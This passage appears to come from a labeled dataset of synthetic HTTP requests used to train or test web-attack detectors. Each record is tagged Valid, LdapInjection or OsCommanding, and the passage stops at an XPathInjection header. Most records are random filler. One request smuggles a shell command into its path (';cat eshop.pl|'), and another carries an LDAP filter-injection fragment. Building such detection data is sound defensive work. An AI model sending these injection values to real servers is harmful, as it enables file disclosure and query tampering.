Start - Id: 5150
class: Valid
PUT /zidiajG/1Z/awiszQ7Gx/e_5eX4OErmk/b47db3gu6gs/dElcs3h7tM/etmnbpiKrjovomsraou/taingdicn6eg/mbdaeheeaob/a6FWAJZ@j86e4ewjFRf/eE9TaOl2theCW3Deq5/eb9lx.dll? HTTP/1.1
Content-Length: 232
Content-Language: zsdc,smj7
Content-Encoding: gzip
Content-Location: /jeeeErc.swf
Content-MD5: cnAxdDdpYXl6N2F0aHN1Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Sep 07 10:55:56 GMT
Last-Modified: Mon, 19 Feb 07 17:55:14 UTC
Host: www.exae.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-kr;q=0.0, x-mac-cyrillic, iso-8859-3, euc-jp;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 56.52.230.64
Cookie: niqa07=/nee
Cookie2: $Version="7"
Date: Tue, 08 Jul 08 06:50:32 GMT
ETag: W/"YOE9Cj.G3xNwVs6YbIL"
Expect: 100-continue
From: sttS3e@cNouiuhrt.it
If-Modified-Since: Wed, 27 Apr 05 18:25:12 CET
If-Unmodified-Since: Wed, 09 Dec 09 20:29:43 UTC
If-Match: "@DUinmvkcoe.iY6Ns"
If-None-Match: *
If-Range: *
Max-Forwards: 1009
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aXJ0Y2lxMW45c2g0bGFvb0hlc0RhYW90dmVzSWFlaThlYXdlYXVsaW8=
Range: 851253-34094,-44,88-5
Referer: http://ntbu.it/zyontfd/fSlq/DzaataF/oObiab/bRTral.jsp
TE: deflate
Trailer: From
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 0.2; 0e-se; rv:6.2.2) Gecko/74266793
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1638x365
Via: HTTP/7.2 94.67.98.106, 5.3 www.5aew.shtml:23377
Transfer-Encoding: gzip
Upgrade: t9eB/4.7
Warning: 099 250.18.191.100 "asvleLepasc" "Fri, 09 Nov 07 15:36:51 UTC"
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 083639126
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

omimEqhw=tDj2enmlejS3h(T&oMhlltg97e2aan=9&mklhoiiu5lra= insertlfep4e gl'lHsil&FvarTzI@74z=67206292&d6ce@B.U=a&kn3mnHqi=levar=%eamnennt&lzd8=asot&gahxhcYiirEefo=o5ZLEi&0uEaloPdua=eh2qiMyagnsamek&tMwnieot=7&winntNEoSNq=3191107

End - Id: 5150
Start - Id: 37917
class: LdapInjection
GET /tAhudnhHh8tD3bZ6L.css?ltilew=f2ihnd&naei1staunndw5=cv%5C&9artlaoreiy=dKnWu&rsalimscn=satxilikehf3abwkr-&dNlink0wp-JczU=eia&Simtoeiy=%29++++%28++++%7C%28soen%3DKue*%29&iGE@GsyZDb=naFZ30&dhrUTgah=iqFh2et&HbOVXchildinclude9VXcc=23526243&s57Q96_jXB=TvcrtddSesTs HTTP/1.1
Host: www.Otp5odold.uk:80
Connection: keep-alive
Accept: video/mpeg;q=0.1
Accept-Charset: euc-cn;q=0.0, euc-tw, windows-874, macintosh;q=0.3, windows-1251;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 223.210.28.59
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Wed, 23 Mar 05 21:52:37 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: 100-continue
From: dshas@enehfts.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Sat, 17 Feb 07 22:12:53 GMT
If-Match: "uuHYBF9HrpVmuPl"
If-None-Match: "XMahy54BWPoUeyn9H"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 154
MIME-Version: 7.8
Pragma: Pns=n0dySecy
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: Basic ZXNpdGV1OnB5eXNvc3Ju
Range: 462856-56111,-65
Referer: /is4n/eAa9eha/g63w4as.php
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 8.8; ys-tl; rv:1.6.1) Gecko/76950872
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: gzip
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37917
Start - Id: 26701
class: Valid
GET /5MutUxU-K8K/2ianetael9w/lVkt0nIKCyj/cnhPiao7rtchaiae/oupmdzEv-9b3H/LAVUWgkZVyO/jnvO/kPS/zetcrJP8/esiolwstg0O.exe?adtseeg7oocN=005199790&8t12L7jL2=m%3Fhttpen&onngahts=%5Br+a%3B9&B8UaSej=n4QwxSxGarv&Unh=0398&TrfSlo0jcrbye=ijMP9&fdwuhnqeimD8=chhrkc9zb%25d4s&reepiAdbohdarC=Lycaeistto0o&0psdaceDhSt=9078829&sYfhpn=hr&9eEnlzrhas=ziaoyNR5pmoy HTTP/1.0
Host: 45.165.208.248
Connection: hocYt
Accept: application/*;q=0.9, audio/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 12.213.50.115
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="4"
Date: Sat, 31 Jan 04 04:25:44 CET
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: erpEn@cctbogs3k.biz
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Wed, 22 Dec 04 08:01:55 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Aug 05 01:41:41 UTC
Max-Forwards: 40
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: onmbd yavoeb=tOonl
Range: 381788-6807
Referer: /wofq8h/enjibj/itmsp/qhrS/Ei5prr.shtml
TE: trailers,deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 6.7; ai-vn; rv:0.2.6) Gecko/09103194
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 231x546
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: compress
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 574 42.50.42.84 "esbdOnaSdh" 
X-Forwarded-For: 168.224.202.103
X-Serial-Number: 55910
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26701
Start - Id: 44550
class: OsCommanding
GET /bin/uT.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: 203.32.218.163
Connection: close
Accept: video/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iads9-hpiEfa3w, sdN-b, t3-us, e-tolrz;q=0.3, a3oln-Anacm9
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="7"
Date: Tue, 17 Oct 06 15:45:17 UTC
ETag: W/"c5DougppZMb-TujuT3"
Expect: etsb1rf=swx0Pizc;eneui
From: tzi1ete@elNpu.cz
If-Modified-Since: Mon, 28 Dec 09 23:50:38 UTC
If-Unmodified-Since: Fri, 22 May 09 02:25:01 GMT
If-Match: "JYZEs@uQtoT38q9rf11B"
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 7
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: tttq amii=me2Eecta
Authorization: Basic dXZ1b2FlcmE6b2lpaHRlZXQ=
Range: -06354,383-6635,26244-
Referer: http://www.rIiV.de/monagie/nraoH/uwnnass/hNdtet.txt
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: eaaluaeerfene
UA-CPU: PowerPC
UA-Pixels: 8286x4573
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 647 www.OdtcirTi.shtml "hsqmvKttea7a" 
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44550
Start - Id: 13643
class: Valid
GET /6dmrqC.jpeg? HTTP/1.0
Host: www.dsNr8.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, deflate;q=0.7, compress;q=0.6, gzip
Accept-Language: *;q=0.4
Cache-Control: h8IpdrHf=seo
Client-ip: 196.2.232.227
Cookie: sanrsTnANrf=eedNeeool;rmib=893659;taiy=3890;sjtitetN6c0et=itdh1n'g1m
Cookie2: $Version="7"
Date: Mon, 25 Jun 07 12:05:47 UTC
ETag: "K9vOMUkI3MCJEL5@HD"
Expect: osehdeM=uiape6e
From: 2uses@EiiTw.cz
If-Modified-Since: Wed, 20 Feb 08 14:48:36 CET
If-Unmodified-Since: Tue, 14 Sep 04 18:17:22 CET
If-Match: "KvSFoCUnTI5uY4kalnVv"
If-None-Match: *
If-Range: "TIFMm73sIfVlwdcg-"
Max-Forwards: 936
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM eWRkY3Y1ZnNhRGZuY3Jpc292b3Rhb2hlaXRzQm9jZXQzaWg2ZGUxcmFlNGhibmNh
Authorization: NTLM ZXByc3JrN2FvZW5rZ3Nzbm5kbWRoZTZ0b3EzZjZlZndzbHI=
Range: 61-
Referer: /r5Qtie/Pphls.tiff
TE: trailers,chunked
Trailer: Warning
User-Agent: iDwtbtTxcPviaalaaini
UA-CPU: StrongARM
UA-Disp: 2950,5748,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6148x9235
Via: FTP/3.7 www.Arnnrgil.tiff, 5.8 34.237.200.250:883
Transfer-Encoding: compress
Upgrade: inj/7.8, aoi/1.3, oOi/5.0, dits/3.0
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 244.48.166.167
X-Serial-Number: 08617413458171074212
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13643
Start - Id: 1328
class: Valid
GET /nlgtr2rnao/qMwK2j@lqgxRPgvuVA/Zpmlie8z/i4zDmJCBDx3ZA0Mp4/pSnJDx.zkW6O/wGsincludeI7KG/donUd/ez.css?ee=Ec2qrttrntitginue&achheeoqgktdih=2&4or0pxeFpnda=bJopTQweimm&daoiz1feuhYs5Er=n7&qottGlwnsenaieE=s2-RVGON1S&c-7vb=rsed&iparhlodoEodis=mY-crbJZn-x HTTP/1.1
Host: 239.64.167.188
Connection: ebrena3
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: Ls-yna, val-g, fa-rn;q=0.4, gpe6Hms-tIA, oenoPg-dssngnct
Cache-Control: max-stale
Client-ip: 184.24.253.5
Cookie: use=etahtw;ok0thw8di8p=8067159
Cookie2: $Version="724"
Date: Mon, 18 May 09 23:38:00 GMT
ETag: "@txm.HfeGYjxhXF"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Sun, 27 Nov 05 11:14:46 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jan 05 03:18:41 GMT
Max-Forwards: 68
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: http://adB4.gov/aSeuer.mpeg
TE: trailers,trailers
Trailer: Via
User-Agent: qE_3Xqx http://www.hei8o.gov
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: 6.1 www.ae65f.tiff, FTP/9.2 227.85.85.104
Transfer-Encoding: 5dt0an
Upgrade: oasUc1/8.1, Dt6u/0.5, ako/9.5, Qsi/1.9, 4ni/6.3
Warning: 184 240.211.239.198 "etlrhegeXod" 
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 28172418351681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1328
Start - Id: 28842
class: Valid
GET /mGE_tOt--pmKfwYiodZc/m9LLV/rnioTylaneeur.html?qhtorhsoydn=2tasssr&G6bses=ytb%27h&oa=Nconnecty8rmr1deleteorhdeletercp&hemLbthUeeI=xatcironpsGg&sT=en&ceh0stsps=n0Fse+8%5Cd7Hrssftp+csD-&c1juldphaa=oElwi5Dnderi6d&sirgewaoweFpn=sSnl&FKyeZ=093&bcauenru4wooH=gt&lejuheHl6=41755052&1xlaa9cicac=lti&rrnp9lccao=ietinrshomeH7S13&josUex=i3passwdg7suz%3B%28fnU%28es&L@c@J1K=896 HTTP/1.1
Host: www.eaesRl.cz
Connection: close
Accept: application/*
Accept-Charset: x-mac-japanese
Accept-Encoding: gzip, compress, deflate
Accept-Language: *
Cache-Control: max-age=1957
Client-ip: 200.47.34.57
Cookie: M-9nph-hS_andnode@1m=7051765;3HFeeDRl2tmwmm=46
Cookie2: $Version="264"
Date: Fri, 05 Sep 08 07:41:35 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 3jmlh
From: 4zbw@syof.net
If-Modified-Since: Sun, 15 Oct 06 17:07:56 GMT
If-Unmodified-Since: Fri, 30 Sep 05 05:27:21 GMT
If-Match: "TjJUPHqc2_ZkldJfSR9"
If-None-Match: "jXD6HcYOONYamlaL"
If-Range: Wed, 16 Apr 08 21:23:54 CET
Max-Forwards: 199
MIME-Version: 9.9
Pragma: d='ceihso7w'
Proxy-Authorization: NTLM SW9oZW8yc1RiaU5lRXNzZDNwb3NsZWVzYWNRbWJpZWxkVTR4R2RxaA==
Authorization: ffri ehTA2pta=enih
Range: 3-,-55290
Referer: http://www.Seijey.biz/Ioih/Beers8ir/aoonqe.php3
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 2.5; em-us; rv:2.7.9) Gecko/43801454
UA-CPU: x86
UA-Disp: 4048,088,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: 5.8 www.LterzxcY.css:89, HTTP/3.8 128.13.200.130:81, HTTP/4.6 www.Esahy.css
Transfer-Encoding: ektso; daNi72=tRrte
Upgrade: EEoc/3.8, n7isho/5.6, mZTrt/4.3, tisotc/2.6
Warning: 157 www.r3hkaor.js "yoe7ri8dLNtecrho" "Tue, 22 Sep 09 04:37:42 CET"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28842
Start - Id: 24915
class: Valid
GET /ewtitdaiaoaote/wnN3/wdNS.FYVSmIZubaOxf./ofaesroAawectj/lPPEZ3y/ecshet3e0tagwau/tithtr3ii7f/i2X_fIIB4/qm5nsDgJQLPbetweenr1e/jIstt/ruqD74wIY.aspx? HTTP/1.0
Host: www.rjau8s.fr
Connection: keep-alive
Accept: text/plain, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=9216
Client-ip: 210.63.57.145
Cookie: wx0io=hncob9i
Cookie2: $Version="2"
Date: Sat, 03 Nov 07 17:03:56 GMT
ETag: W/"@PFwuy_CDfc9Wn35@u@N"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sun, 17 Jul 05 06:08:10 UTC
If-Unmodified-Since: Sun, 18 Jul 04 06:46:50 CET
If-Match: "cxKzojTCNngqoQN"
If-None-Match: *
If-Range: Tue, 18 Nov 08 20:22:06 CET
Max-Forwards: 0
MIME-Version: 2.5
Pragma: ehema5e=ralmell
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic YXNjZTpJM0lvbw==
Range: -115
Referer: /7sing/R0tiTrs6/sob3.js
TE: deflate,chunked
Trailer: If-Range
User-Agent: nuuuie
UA-CPU: MIPS
UA-Disp: 149,2049,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5160x7333
Via: 3.3 www.iattnGny.shtml
Transfer-Encoding: cjcuh
Upgrade: eioe/8.0, tttl/1.6, aeanad/4.0
Warning: 316 235.226.9.117:9331 "tussPlVme6tet" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24915
Start - Id: 12540
class: Valid
GET /rdO.exe? HTTP/1.1
Host: www.zctii.cz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: hter-Oe2eEsp, j5vjnI-5uitiN, N-hreWe;q=0.2, s-geb9enn, dcsto-t;q=0.2
Cache-Control: mesgMoh='0nEiatr'
Client-ip: 33.100.30.116
Cookie: fltWtnoded=ashqhaxwsa
Cookie2: $Version="086"
Date: Thu, 16 Mar 06 10:55:08 UTC
ETag: W/"HXrxBq@XzwUSdKt8QB"
Expect: sedlo=irnMm
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Sun, 11 Jun 06 13:39:50 UTC
If-Unmodified-Since: Wed, 02 Jun 04 18:10:03 CET
If-Match: "Q0JSwddaPfl2Q6ChR"
If-None-Match: *
If-Range: Mon, 04 Jun 07 10:34:36 CET
Max-Forwards: 75
MIME-Version: 8.2
Pragma: 7=aesnos9
Proxy-Authorization: NTLM cGVpb0FyeEkyYnRzbzg4YWllY2VrZXdmc28yaW1oMGN0dDZhZmVycjV1cmluaDY=
Authorization: Basic d3RldGc6NFRvQQ==
Range: 79521-822865,4-
Referer: /kbegerAe/pnjh/yzod/llriH/qoe795as.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.2 (compatible; MSIE 0.3; Open BSD i386; raQe; cDaiZhizs; mtEevnA)
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 366x415
Via: FTP/9.1 www.afnng.shtml, 2.8 www.fngradlh.js
Transfer-Encoding: compress
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 2197491883894
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12540
Start - Id: 2296
class: Valid
GET /xcbetiktiitl.js?ees=-+e%24t%3CoeqgIsh7pn+fe&at=eesneh9k%3Cm1au7&ntR1aepeoIvnjoM=gtsEtiasystemsmopec+Aone&C11Sxp_inEtmpcselectwinnt2=498988127&0eee=eAess&aa1tnOwocdocgro=ha0dycncdfieho&l9eemt=72&laenrohf=ls+mEcn8%26access_logcX&X-z2zVZ=zt&de=ke+%24d&wscfssqhfo=%29na&Vt86XQb=2581&utzqefexE=tYEK6ppz&wr7=%5CisO%3C%5Bdocument0%3EC%5Cmjsdta%7Ei&r0vweieeanocys=026648 HTTP/1.0
Host: 225.239.49.33
Connection: close
Accept: text/xml;q=0.2, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eola0-arrpU;q=0.7, gepae-wjo;q=0.3, ib-bvdthesc, otsany-Nd;q=0.8
Cache-Control: e=iu2aa9d
Client-ip: 39.40.75.177
Cookie: ee8pwhdes=70596;.9yy4V=ii0oguhdds;toocee0Ljles=7205803
Cookie2: $Version="8"
Date: Mon, 04 Jun 07 13:47:33 UTC
ETag: W/"7ZhZ1Lu8mNJyKNbAY"
Expect: 100-continue
From: Epwt@mIbard.com
If-Modified-Since: Wed, 18 Aug 04 23:46:21 CET
If-Unmodified-Since: Wed, 25 Nov 09 18:55:12 GMT
If-Match: *
If-None-Match: "hPV1qoCRFqJ7e5p"
If-Range: *
Max-Forwards: 121
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: mieIN frf5oprp=1rjel
Range: -84,1854-0094,24267-16724
Referer: /utori.cgi
TE: chunked;q=0.6,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.7 (Windows; U; Win98 4.1; n4-o9; rv:3.5.4) Gecko/66781189
UA-CPU: 68000
UA-Disp: 359,305,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6264x742
Via: FTP/3.1 54.93.52.93, Eafs/9.2 www.fe8ainn.htm:1, FTP/8.9 www.ocslo.gif
Transfer-Encoding: vTiuc
Upgrade: genlR/0.3, rbx/3.6, eue/8.6, et6E6/2.3
Warning: 499 www.pnir9pr.htm "tr45ntaeteaI" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2296
Start - Id: 15604
class: Valid
GET /miyot/i55jU7w6M2/oZz.zGxYz/ob6ib/iOfsmh/siEi.aspx?freesrtip0=saesrcsoiYe&ritstelo9ry=tYYcdJ7zMT3c&_xp_zMP3qBZJ=wfsiattc&obeen=3&m6Enekep=3ia&I3lo95MlPrG=81135533&nOeesl=29 HTTP/1.1
Host: www.nsAphrc3.be
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.4, koi8;q=0.8, euc-jp;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: Dte-ERua, ssr-O0l, rotetlh-niuo, a-aHhysiu;q=0.1, oPokaIa-asrn
Cache-Control: only-if-cached
Client-ip: 120.213.203.8
Cookie: kb=0007651;o0h8dnMnheeaia5=a.7;dasu=e7ref%h 6nph-et1ot;2objectSU4tybQ1-=n0iE2ttsole;hs5i=27265654;ni6ao=8
Cookie2: $Version="758"
Date: Thu, 03 May 07 05:24:31 CET
ETag: "h2ZBzGpTvy6VeGBY6A99"
Expect: 5EKt9
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Fri, 27 Nov 09 02:59:04 UTC
If-Unmodified-Since: Sat, 17 Apr 10 16:36:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.8
Pragma: kvoaDe=1rT
Proxy-Authorization: vrynOe rp7b=4e4ltho
Authorization: psltiV egca8zen=tdad
Range: 713-,63505-263305,-5
Referer: /itnstqa.asp
TE: gzip;q=0.4,trailers,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: xc9Rent (bMc_MxaIOI; yCDrztka; 3Ra_-lpBia; 6nwYLo-TL-; nYoI6RNW)
UA-CPU: x86
UA-Disp: 6997,2837,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: FTP/5.9 www.nwicE.htm
Transfer-Encoding: identity
Upgrade: cpawE/0.0, gtht/7.8, hnlurk/2.7
Warning: 527 23.111.131.67 "talhHnbs0" 
X-Forwarded-For: 86.193.245.82
X-Serial-Number: 42056284732310990
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15604
Start - Id: 4655
class: Valid
POST /kjEaae5ia/e36bna7nM/0tetmeiAomijfajyu3/eRlaen/zjud8fkenhtemb/if0K1dcJek.6EX/o87rd6sll/eyttadi8/qfztwea.php3? HTTP/1.1
Content-Length: 316
Content-Language: 2lmba,qh,5antez
Content-Encoding: identity
Content-Location: /Syeueub/Niir4e/rase9scn/SseabqVf.jsp
Content-MD5: bXVwbTVlY3ZiTlJ3ZGQwTw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Apr 09 03:12:27 UTC
Last-Modified: Thu, 04 Jan 07 16:52:10 GMT
Host: www.tts8tHmrai.fr
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1251;q=0.9, iso-10646-ucs-2;q=0.9, big5;q=0.1
Accept-Encoding: compress, compress, identity;q=0.4, deflate;q=0.9, gzip
Accept-Language: x-p, o0nyi-e, qr-moeOatha;q=0.4, reat7Ar-ltimto, rsBod-7hn;q=0.8
Cache-Control: only-if-cached
Client-ip: 58.120.66.6
Cookie: lfe5z1g7mtoha3r=sitw5;bchn9o0hnnohie9=9274678197;y1sprehyol= e;3SBqgNW=dfti-hrdiwo6aqraa3ls
Cookie2: $Version="65"
Date: Wed, 12 Dec 07 05:35:15 UTC
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Fri, 06 Mar 09 17:12:41 UTC
If-Unmodified-Since: Fri, 03 Sep 04 14:05:26 CET
If-Match: "_R0Sqs8ZOcX429Rvv0L"
If-None-Match: "cEyGW_nCzCYHeEW_zUT"
If-Range: *
Max-Forwards: 86
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: NTLM dGJzb2wxaExlMXR1b3V5N3NpcnJkc2V0b3JFZHZpbTA=
Range: -5,386883-,153-
Referer: /Tcynib/dis7k/s2aqlt/HotHgEta/etwn.txt
TE: chunked,gzip,deflate;q=0.1
Trailer: Host
User-Agent: Mozilla/2.4 (compatible; ehrV9Kdru; Mac OS X; tbibd11wm4; Bdasm; iy7to)
UA-CPU: 68000
UA-Disp: 0704,6679,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0964x700
Via: 5.7 63.255.23.217, 8.1 29.226.34.55, FTP/1.2 www.heei2e.css
Transfer-Encoding: compress
Upgrade: 4fZfWy/9.8, wdrsia/5.8, 9ie/8.3
Warning: 903 244.235.3.1 "gubhiAseegt" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phraEg=enWx-&Jttayoert11vod=65&Eih=gentascgtcthis7&aomil=re&gs=he4celyrhp40ta&ee9llEdtlosel=[7passthruieIpositiontr8tT|y&rmee9IueieEt=emeta|wa&ixnleslathOej=rWE&iyrtorpfhEhdin=45avcn1eNteht&isdroaeieaysx=081&ecn=7d7&99Kdsbwp-= tnullst&dod=RleselectgcsIai&erbinrer=htpassttamixrRo&&prad=eife etfwgetx5mailvniU

End - Id: 4655
Start - Id: 5684
class: Valid
PUT /IlniU4urdlina4zyvmZn/fh/iV/ivvpEJZChiGE3ea0eh7O/adntilimii/thGoCryvy0-oDDfvSN../eb9Hw9/dhofyR0/abetweenImuh-e9M/oseiuecostoteh/oX6lqspHDmT5mXJU.exe? HTTP/1.0
Content-Length: 44
Content-Language: weflt2,bacteh,nna
Content-Encoding: compress
Content-Location: /nwye/bdeHh.jpeg
Content-MD5: aW1ycmJlRW9scjZtcnRlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 04 06:27:47 GMT
Last-Modified: Sat, 04 Dec 04 07:15:06 CET
Host: www.taaolthtMh.net
Connection: va8sr
Accept: video/*, text/*;q=0.1, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cr-meoqw;q=0.7, 3-t;q=0.5, oaeon-heskEdqp, tzjo-yftof
Cache-Control: max-age=88826
Client-ip: 52.203.165.218
Cookie: 8eaqee5viloq=Iy;lEsdtei9eim=ttttmtpn;XrN-Y=87ovImxmlppohlibinsertr;kam6e7Mrsard9=1101;xtcsnltd=188454866;eE=>f
Cookie2: $Version="01"
Date: Wed, 18 Jul 07 01:21:12 GMT
ETag: "gA-VXXIIO8mh8_lp"
Expect: pige=eph8;ttll6v
From: 6onsas@rsaEn.cz
If-Modified-Since: Thu, 15 Oct 09 16:00:20 GMT
If-Unmodified-Since: Mon, 03 Sep 07 09:07:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 141
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 5emer ephane=n6oq
Authorization: tr4isr cg06om=sohrn
Range: -816900,24457-
Referer: http://Mrnya.net/i19O/yiqf.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: iznDjz http://www.sssi.gov
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: 4.1 62.7.158.126, nato/2.0 233.230.181.234, 66rt/3.6 www.ouaw.jpg
Transfer-Encoding: vhniRm; ofpannue=uesk
Upgrade: tou/1.5, iievh/5.0, uedx/3.7
Warning: 162 253.233.234.60 "iILnb" "Mon, 07 Nov 05 13:32:13 UTC"
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To359oxs4inslc=9195306143&M9dtehaNgnNo=dUgJb

End - Id: 5684
Start - Id: 49909
class: XPathInjection
